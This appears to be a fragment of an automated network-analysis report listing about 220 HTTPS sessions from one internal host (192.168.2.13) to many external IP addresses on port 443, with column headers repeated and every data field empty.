                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22147192.168.2.1341096200.159.68.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22148192.168.2.135556687.35.135.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22149192.168.2.1333410192.187.86.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22150192.168.2.1358264201.76.124.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22151192.168.2.134972027.48.192.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22152192.168.2.1338692194.85.110.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22153192.168.2.135927871.70.109.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22154192.168.2.136045058.99.174.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22155192.168.2.1336668164.95.171.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22156192.168.2.134823886.16.166.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22157192.168.2.1356408197.66.178.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22158192.168.2.1334530190.24.24.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22159192.168.2.133635485.200.68.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22160192.168.2.1350090192.162.26.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22161192.168.2.133638077.179.59.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22162192.168.2.1356350130.244.7.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22163192.168.2.135748884.221.110.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22164192.168.2.133277234.181.238.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22165192.168.2.1345222113.177.76.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22166192.168.2.1343136147.59.169.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22167192.168.2.133821850.85.44.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22168192.168.2.13545241.0.197.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22169192.168.2.1333560210.255.181.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22170192.168.2.1352658198.251.72.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22171192.168.2.135316218.219.27.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22172192.168.2.135565062.83.18.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22173192.168.2.134847644.71.195.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22174192.168.2.1338504118.203.76.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22175192.168.2.135762690.192.67.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22176192.168.2.13541169.219.47.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22177192.168.2.13469045.68.160.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22178192.168.2.135606295.180.163.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22179192.168.2.135622279.190.63.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22180192.168.2.1354538208.149.145.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22181192.168.2.1338022128.143.51.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22182192.168.2.1347976139.160.166.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22183192.168.2.1359340206.70.240.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22184192.168.2.135786483.16.205.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22185192.168.2.133824012.224.188.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22186192.168.2.134039031.115.160.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22187192.168.2.1357958204.236.230.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22188192.168.2.1334766211.84.246.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22189192.168.2.136039664.202.236.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22190192.168.2.133345087.230.79.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22191192.168.2.134571472.199.38.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22192192.168.2.135904293.234.11.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22193192.168.2.1337792157.204.213.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22194192.168.2.135575875.151.214.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22195192.168.2.13489804.212.8.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22196192.168.2.13571685.196.246.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22197192.168.2.1341228133.62.68.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22198192.168.2.1346472206.27.29.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22199192.168.2.1349146164.107.215.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22200192.168.2.1337300151.128.52.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22201192.168.2.133953298.227.163.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22202192.168.2.134715496.67.249.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22203192.168.2.1359620212.85.33.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22204192.168.2.1347142148.2.127.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22205192.168.2.1333188167.98.47.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22206192.168.2.135453869.110.226.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22207192.168.2.1334584138.201.164.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22208192.168.2.1354698156.198.37.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22209192.168.2.1359116188.54.152.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22210192.168.2.1336998101.110.53.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22211192.168.2.135193063.145.40.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22212192.168.2.1350326159.214.205.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22213192.168.2.1351032113.140.214.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22214192.168.2.134169814.242.43.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22215192.168.2.13341849.177.131.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22216192.168.2.136034657.150.184.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22217192.168.2.133472277.179.5.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22218192.168.2.1345238130.225.26.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22219192.168.2.1346228141.68.57.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22220192.168.2.1334784158.185.89.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22221192.168.2.1335762219.146.245.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22222192.168.2.134862446.208.230.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22223192.168.2.1342270210.153.21.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22224192.168.2.1347038223.103.18.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22225192.168.2.135752623.17.6.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22226192.168.2.1346644200.237.147.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22227192.168.2.1358946104.117.88.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22228192.168.2.1341072124.58.190.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22229192.168.2.1356214181.50.222.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22230192.168.2.1339138204.27.115.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22231192.168.2.1355888170.54.149.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22232192.168.2.1337048111.8.217.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22233192.168.2.1343844203.103.244.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22234192.168.2.133915267.7.88.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22235192.168.2.1333048168.183.253.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22236192.168.2.135110034.62.5.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22237192.168.2.1336090124.82.230.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22238192.168.2.1358820141.203.240.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22239192.168.2.1337492176.159.48.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22240192.168.2.135834083.25.195.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22241192.168.2.1338522100.134.183.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22242192.168.2.135309061.132.17.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22243192.168.2.1343380187.103.91.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22244192.168.2.135625693.71.34.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22245192.168.2.135193443.201.102.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22246192.168.2.1350848117.128.229.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22247192.168.2.135038832.3.129.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22248192.168.2.133778459.240.135.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22249192.168.2.1333788185.21.208.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22250192.168.2.134694057.71.209.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22251192.168.2.133684853.244.222.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22252192.168.2.133900642.99.185.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22253192.168.2.134927837.235.207.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22254192.168.2.133867014.248.225.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22255192.168.2.135621085.254.245.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22256192.168.2.1341560175.121.156.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22257192.168.2.1334502213.254.45.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22258192.168.2.1355786178.197.71.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22259192.168.2.1338808184.78.197.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22260192.168.2.1357486200.133.151.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22261192.168.2.135837832.28.194.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22262192.168.2.134886249.224.244.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22263192.168.2.133753271.87.101.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22264192.168.2.134397083.46.58.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22265192.168.2.1351326189.116.235.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22266192.168.2.1358168195.231.46.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22267192.168.2.135059613.205.253.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22268192.168.2.1344632139.128.23.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22269192.168.2.1345894196.105.57.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22270192.168.2.1349478116.119.8.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22271192.168.2.1354994131.145.5.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22272192.168.2.1338282123.212.76.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22273192.168.2.133748887.96.36.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22274192.168.2.1333390148.215.170.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22275192.168.2.1336284162.140.68.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22276192.168.2.1347086152.20.191.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22277192.168.2.136050696.22.56.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22278192.168.2.1353012213.194.249.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22279192.168.2.1356804213.215.227.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22280192.168.2.134071671.59.236.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22281192.168.2.135014064.146.104.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22282192.168.2.1345188173.120.91.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22283192.168.2.133867624.49.233.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22284192.168.2.1344352189.25.32.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22285192.168.2.134730619.39.165.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22286192.168.2.1358818142.50.239.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22287192.168.2.1355858174.151.66.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22288192.168.2.1348102203.47.44.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22289192.168.2.1353910174.213.130.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22290192.168.2.1345052168.102.126.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22291192.168.2.1351636163.179.78.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22292192.168.2.134209084.167.119.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22293192.168.2.133859252.20.120.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22294192.168.2.13431709.251.58.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22295192.168.2.1356946117.141.160.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22296192.168.2.1339742145.92.15.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22297192.168.2.1337678201.67.205.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22298192.168.2.1339688155.99.236.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22299192.168.2.1338672175.247.27.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22300192.168.2.1346416220.30.131.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22301192.168.2.134954048.77.134.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22302192.168.2.1351196157.99.106.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22303192.168.2.133334266.17.160.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22304192.168.2.134173094.250.243.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22305192.168.2.133615645.250.217.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22306192.168.2.135019631.254.201.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22307192.168.2.1353026104.99.201.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22308192.168.2.133829065.94.57.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22309192.168.2.1358944209.44.12.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22310192.168.2.134866676.169.75.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22311192.168.2.133815814.107.43.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22312192.168.2.1338420201.5.102.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22313192.168.2.134924031.163.218.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22314192.168.2.1344348187.164.80.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22315192.168.2.1343466206.82.130.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22316192.168.2.135455893.243.175.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22317192.168.2.1348856184.211.37.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22318192.168.2.1347950203.252.217.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22319192.168.2.133296467.137.106.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22320192.168.2.135386817.215.167.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22321192.168.2.1344478211.245.17.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22322192.168.2.1358562142.172.167.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22323192.168.2.1349548196.220.234.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22324192.168.2.134194431.36.64.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22325192.168.2.134478281.135.218.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22326192.168.2.1342556143.88.97.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22327192.168.2.13363005.144.208.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22328192.168.2.1357256193.173.37.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22329192.168.2.1353746136.186.2.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22330192.168.2.135120035.213.172.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22331192.168.2.133772292.32.46.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22332192.168.2.1350464147.215.105.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22333192.168.2.133519295.9.235.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22334192.168.2.134866875.153.50.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22335192.168.2.1333996179.212.242.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22336192.168.2.1339432191.86.126.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22337192.168.2.1345470191.26.109.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22338192.168.2.134892459.68.206.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22339192.168.2.135040458.94.2.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22340192.168.2.1348560126.125.204.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22341192.168.2.1348666188.159.209.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22342192.168.2.133623267.189.218.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22343192.168.2.133318488.63.244.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22344192.168.2.133500292.222.208.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22345192.168.2.134515235.145.241.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22346192.168.2.1337068192.211.106.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22347192.168.2.1336796184.225.26.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22348192.168.2.1336376171.113.200.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22349192.168.2.1349286195.19.55.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22350192.168.2.1354414166.16.204.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22351192.168.2.1360056154.211.130.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22352192.168.2.1339412218.84.58.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22353192.168.2.13502648.109.241.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22354192.168.2.1360134170.44.143.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22355192.168.2.133689288.253.165.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22356192.168.2.1348544118.85.186.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22357192.168.2.1342710162.230.250.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22358192.168.2.133379027.6.160.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22359192.168.2.135261059.59.241.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22360192.168.2.134193237.147.213.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22361192.168.2.13515444.168.230.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22362192.168.2.1339760107.107.204.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22363192.168.2.1359096146.226.84.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22364192.168.2.13564501.79.101.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22365192.168.2.1345484121.89.110.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22366192.168.2.1332980160.22.199.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22367192.168.2.1355220106.17.22.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22368192.168.2.133735868.234.134.251443
                                        TimestampBytes transferredDirectionData


